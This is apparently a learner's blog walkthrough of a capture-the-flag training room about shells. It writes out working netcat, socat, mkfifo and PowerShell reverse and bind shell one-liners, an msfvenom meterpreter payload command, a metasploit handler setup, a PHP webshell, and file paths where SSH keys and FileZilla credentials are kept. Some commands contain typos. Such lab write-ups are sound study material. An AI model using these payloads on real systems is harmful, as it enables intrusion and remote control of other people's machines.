Here we go, on with another room in the Complete Beginner learning path!
netcat, socat, metasploit I have used before – some of them even documented in posts!
msfvenom is new though, so that’s exciting.
With regards the links here:
- Payload all the Things and PenTest Monkey are both fantastic, I have dipped my toe into those before
- knowing the local storage of webshells is useful too – make a note of /usr/share/webshells
- the SecLists Repo is great as well, you can create an entire directory within wordlists for this
The most important things to understand here are that a reverse shell has a listener on your system, and a bind has a listener on the other
I personally haven’t done much in the way of bind, but reverse shells are very common thus far on THM/HTB
With regards the questions:
- a reverse shell has a listening port on your computer, so ‘r’
- most webshells are non-interactive (so ‘n’), you commonly put code into a browser url bar or something similar, and it just returns info
- a bind shell, as described, is a listener on the target machine (aka not yours) so ‘t’
netcat is something to get used to, so take some proper time to explore this page and make sure you understand it fully
again, reverse shell has the listener on your computer
- setting that up with netcat is so easy, it’s simply command ‘nc -lvnp 1234’ or something like that
- you an choose whatever port you like, I just use 1234 or 443 as they’re common and easy to remember
- so, the listening option is ‘-l’
- as we stated above, connecting to a bind simply requires the target IP and listening port
- so connecting to that IP would simply be ‘nc 10.10.10.11 8080’
Task 5 – Shell Stabilisation
Right, ace, we’ve done this before so let’s give this a quick look over
Python I’m familiar with (in this context, not the language at large – that’s down the list of things to learn)
- key points are commands like ‘python -c ’import prt;pty.spawn(“/bin/bash”) to spawn a better shell, ensuring to check which version of python; ‘export TERM=xterm’ to give us access to more commands; and ‘stty raw -echo;fg’ which turns off our terminal echo and foregrounds the shell (that’s the fg bit)
- rlwrap I’ve never used and apparently gives a better base shell, so I’ll look forward to messing about with that in the future
- key points here are commands ‘sudo apt install rlwrap’ (because obviously); ‘rlwrap nc -lvnp <port>’ to set up the rlwrap listener; and ‘stty raw -echo; fg’ which is the same as before
- socat is the next step up from netcat and requires an already-active netcat shell to upload the socat binary to
- key points: on your machine set up a webserver ‘sudo python3 -m http.server 80’ and on the target use your nc shell to download the binary w/ command ‘wget <local-IP>/socat -0 /tmp/socat’
- finally we can look at changing the terminal tty size (not something I’ve done, but have learned this before)
- key points: find out and note down current tty rows & columns with command ‘stty -a’; in reverse/bind shell ‘stty rows <number>’ and ‘stty cols <number>’
Right, so this is more in-depth as the syntax is a bit whacky, so here are some cliff notes:
- listener is set up for reverse shell with ‘socat TCP-L:<port> -’ (that’s the answer to the Q at the bottom btw – TCP-L:8080) – this is similar to nc -lvnp
- connect back w/ command ‘socat TCP:<localIP>:<localport> EXEC:”bash -li”’
- for a bind shell, on target system command ‘socat TCP-L:<port> EXEC:”bash -li” (remember, it’s backward to a reverse shell)
- connect our machine via ‘socat TCP:<targetIP>:<targetport>’
- the key benefit of socat is a fully stable Linux tty reverse shell, so a different listener is used for this – command ‘socat TCP-L:<port> FILE:’tty’,raw,echo=0′ (the equivalent of CTRL+Z and then ‘stty raw -echo; fg’ as we’ve seen before)
- the special listener is super powerful but requires your target already have socat installed, which isn’t always the case (though you can do it with the binaries in the link provided) – special command is ‘socat TCP:<yourIP>:<yourport> EXEC:”bash -li”,pty,stderr,sigint,setsid,sane’
Task 7 – socat Encrypted Shells
Okay, lots here so I won’t spend time re-writing what already is written, let’s just break down how to get the answers!
We’re asked to set up an openssl-listener using the previous tty technique
- first off, we’re asked for a listener on port 53 so ‘socat openssl-listen:53’
- then we need to use the .pem file provided – ‘cert=encrypt.pem,verify=0’
- and finally the tty we looked at previously ‘EXEC:’tty’,raw,echo=0′
- answer should be ‘socat openssl-listen:53,cert=encrypt.pem,verify=0 EXEC:`tty`,raw,echo=0’
- Then we’re asked to get the syntax for connecting back to a listener
- we know connect back begins with ‘socat openssl:<localIP>:<localport>’, our IP and port are given so it’s ‘socat openssl:10.10.10.5:53’
- we also know we have to add ‘verify=0′ prior to our EXEC
- we’re also given the parameters of using EXEC encryption and parameters (it’s in the hint)
- so, should be ‘socat openssl:10.10.10.5:53,verify=0 EXEC:”bash -li”,pty,stderr,sigint,setsid,sane’
Task 8 – Common Shell Payloads
Once again in this task we’re pointed toward Payload all the Things – so go and check it out
This is just a page of payload commands, so not worth me going through in detail. Highlights include:
- using netcat as a bind shell – ‘nc -lvnp <port> -e /bin/bash’
- reverse shell – ‘nc <localIP> <port> -e /bin/bash’
- creating a listener for a bind shell – ‘mkfifo /tmp/f; nc -lvnp <port> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f’
- ◇ ‘mkfifo’ is the answer to the question below, by the way – it creates a named pipe at /tmp/f, starts the nc listener, then bangs the input of the listener to the output of the named pipe
- and reverse shell… ‘mkfifo /tmp/f; nc <localIP> <port> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f’
- absolute craziness for Powershell reverse shell – powershell -c “$client = New-Object System.Net.Sockets.TCPClient(‘<ip>’,<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Let’s review some of the key commands, as we’ll need them for our answer later:
- standard syntax – ‘msfvenom -p <payload> <options>’ and the example given is ‘msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>’
- incidentally, we’re told here that stageless shells are shown by the ‘_’ symbol for Q2
- basic way of naming a payload follows ‘<OS>/<arch>/<payload>’ so example: ‘linux/x86/shell_reverse_tcp’ or ‘linux/x64/meterpreter/reverse_tcp’
- this has given us all the info we need to complete the final question, by the way – you can pull all of this info together to work out the final answer, given we know the IP and port, format = elf and output = shell#
- final answer (Q3): ‘msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell lhost=10.10.10.5 lport=443’
Task 10 – metasploit multi/handler
Cool, familiar ground – we covered this in our metasploit and blue modules! Go back and read those if you haven’t already
- ‘msfconsole’ to open metasploit, though I like to use the -q switch to reduce the clutter
- ‘use multi/handler’ to get cracking
- ‘show options’ to see what needs setting, then ‘set payload’, ‘set lhost’ and ‘set lport’ as all are required for your listener
- lhost will be your tun0 IP if on openvpn – lport the port of your choosing
- ‘exploit -j’ with the -j being the option to run as a job in the background
- ‘sessions <#>’ to foreground sessions
- # being the number of the session you want to fg – if you aren’t sure, you can use ‘sessions’ to show what’s active
- all this gives you the answers to the questions:
- ‘exploit -j’
- ‘sessions 10’
Great, we’ve done this before too! I think this was in the PickleRick CTF I did, so check that out (note in post-edit: I haven’t released the PickleRick CTF walkthrough yet)
Webshells are quite basic at this level, so here’s some top tips:
- easily create a webshell script by using ‘nano webshell.php’ and copying this script: <?php echo “<pre>” . shell_exec($_GET[“cmd”]) . “</pre>”; ?> – hit ctrl+x, y, enter
- alternatively, check out PentestMonkey as suggested in the text – though this specific link gives a reverse shell and you will need to edit it with your IP and listening port etc
- upload this somewhere that will let you do so on the webserver you’re attacking
- navigate to the webshell in your browser (in THM this usually takes the form of ‘http://<targetIP>/uploads/webshell.php’)
- you use the parameter ‘?cmd=’ to input your commands, so if you had found a flag you could do ‘http://<targetIP>/uploads/webshell.php?cmd=cat flag.txt’ to read it, or ‘?cmd=get flag.txt’ to download it
I think most of this could be summarised with:
- shells are unstable
- escalate out of that shell quickly
- SSH is a good way of doing this so find where the SSH keys are stored
- Linux – /home/<user>/.ssh
- Windows is more complicated, you could check – C:\Program Files\FileZilla Server\FileZilla Server.xml or C:\xampp\FileZilla Server\FileZilla Server.xml
- just get into the system in another way quickly
Task 13 – Practice & Examples
If you want the walkthrough for the practicals, you can continue reading here...
